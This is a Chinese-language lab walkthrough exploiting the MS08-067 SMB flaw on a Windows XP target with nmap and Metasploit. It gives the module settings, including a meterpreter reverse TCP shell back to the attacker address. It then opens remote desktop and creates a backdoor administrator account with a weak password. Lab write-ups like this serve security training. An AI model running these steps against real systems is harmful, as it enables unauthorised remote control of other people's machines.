MS-08-067 windows smb服務 遠程命令執行漏洞


漏洞概要

MS-08-067是Windows平台中smb服務445端口的遠程代碼執行漏洞
利用成功可以遠程控制主機
影響范圍為:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7

實驗場景

攻擊機:kali2022msfconsole利用
靶機:windows xp

漏洞利用

使用ifconfigipconfig獲取攻擊機和靶機的IP地址
攻擊機IP:172.16.1.117

靶機IP:172.16.1.116

nmap的默認腳本在/usr/share/nmap/scripts,ls -l| grep 08-67篩選漏洞相關模塊

使用nmap的漏洞掃描腳本smb-vuln-ms08-067掃描靶機是否存在ms-08-067漏洞

nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n


發現存在漏洞,使用msfconsole進行利用
msfconsole啟動漏洞平台

查找漏洞利用腳本

search ms08_067


使用漏洞利用模塊,並使用show options查看漏洞利用模塊配置參數

use exploit/windows/smb/ms08_067_netapi
show options

Requiredyes是必須要設置的參數

在最新版kali中,對常見的漏洞自動選擇了合適的payload,例如這里的windows/meterpreter/reverse_tcp,並且配置自動配置了反彈會話的IP地址和端口
就是我們本機的IP和端口

如果不是這個payload需要我們手動設置

set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444


觀察我們必須設置目標的IP地址,就是RHOSTS,這里如果是RHOST是只可以設置一個IP地址,如果是RHOSTS則可以設置一個網段,對一個網段進行攻擊

設置目標IP

set RHOSTS 172.16.1.116


這里端口默認就是445端口,不在改變
這里有一個target可以設置,target是用來指定靶機操作系統類型的,指定的准確的話,跟容易利用成功
show targets可以查看可以設置的target

這里有很多taret,我么使用target代號為34的
set target 34

設置完成后,可以使用check命令查看靶機是否存在這個漏洞,check只有在一些常見的漏洞中可以使用

存在漏洞,使用命令exploit或者run進行漏洞利用

利用成功,成功獲取靶機會話,並且權限為SYTEM最高權限
后面我們可以開啟靶機的3389端口,進行遠程桌面連接
使用run getgui -e開啟靶機3389端口

netstat查看靶機3389端口是否開放

創建hacker用戶,並加入到Aministrators默認管理員組

net user hacker 123456 /add
net localgroup Aministrators hacker /add

最后可以使用net user hacker查看是否已經加入到管理員組

打開一個新的終端,連接靶機遠程桌面

rdesktop -u hacker -p 123456 172.16.1.116


成功獲取靶機權限


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM